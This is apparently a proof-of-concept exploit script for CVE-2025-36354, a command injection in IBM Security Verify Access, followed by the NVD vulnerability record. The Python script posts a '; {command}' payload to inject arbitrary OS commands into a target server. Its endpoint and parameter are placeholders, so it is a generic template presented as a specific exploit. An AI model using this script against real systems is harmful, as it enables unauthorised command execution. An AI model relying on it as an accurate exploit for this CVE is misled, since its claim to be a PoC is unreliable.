CVE-2025-36354

# CVE-2025-36354 - IBM Security Verify Access Command Injection PoC # Vulnerability: Unauthenticated command injection via improper input validation # Affected: IBM Security Verify Access 10.0.0.0-10.0.9.0, 11.0.0.0-11.0.1.0 import requests import sys TARGET_URL = "https://target-ibm-verify-access.example.com" VULNERABLE_ENDPOINT = "/<vulnerable_endpoint>" # Replace with actual vulnerable endpoint def exploit(target_url, command): """ Exploit command injection in IBM Security Verify Access The vulnerability allows unauthenticated command execution with lower user privileges due to improper input validation. """ # Inject OS command via user-supplied input parameter payload = f"; {command}" headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } data = { "inputParam": payload # Replace with actual vulnerable parameter name } try: response = requests.post( f"{target_url}{VULNERABLE_ENDPOINT}", data=data, headers=headers, verify=False, timeout=10 ) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text[:500]}") return response except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url> [command]") print(f"Example: {sys.argv[0]} https://target.example.com 'id'") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] if len(sys.argv) > 2 else "id" exploit(target, cmd)

{"cve": {"id": "CVE-2025-36354", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:05.127", "lastModified": "2025-12-15T19:23:22.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Security Verify Access and IBM Security Verify Access Docker 10.0.0.0 through 10.0.9.0 and 11.0.0.0 through 11.0.1.0 \n\n\n\ncould allow an unauthenticated user to execute arbitrary commands with lower user privileges on the system due to improper validation of user supplied input."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndExcluding": "10.0.9.0", "matchCriteriaId": "CCA4ADF8-014B-4A43-AE12-CC7D46B0F8BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:-:*:*:*:*:*:*", "matchCriteriaId": "9916DF0F-8A3E-4CB4-957F-286E168666A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix1:*:*:*:*:*:*", "matchCriteriaId": "05FBA01C-DDCD-4B80-B14B-81DAB052CC8D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix2:*:*:*:*:*:*", "matchCriteriaId": "149CA168-1117-4B50-8F5A-B72D4BCC65F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndExcluding": "10.0.9.0", "matchCriteriaId": "FFF4D7D4-0D01-44CA-84A2-2EA59802D1CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:-:*:*:*:*:*:*", "matchCriteriaId": "7E76C6CF-1E2A-403E-9C7F-619BE2057468"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:interim_fix1:*:*:*:*:*:*", "matchCriteriaId": "B8BF3374-6B03-4A25-9F4D-F88C091804C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:interim_fix2:*:*:*:*:*:*", "matchCriteriaId": "C8D09601-F55B-4307-8BEE-218F5CAC2138"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0.0", "versionEndExcluding": "11.0.1.0", "matchCriteriaId": "16595130-3A46-4DD1-9DAA-53E534306975"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access:11.0.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "4A7A934C-F8B6-44D1-9591-A3FDB86BEECB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access_docker:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0.0", "versionEndExcluding": "11.0.1.0", "matchCriteriaId": "81BD4D96-C9E9-422B-B18A-61ECFE711884"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access_docker:11.0.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "0C06D5AD-67DD-46FA-BDF7-39A2E0EAAF95"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247215", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}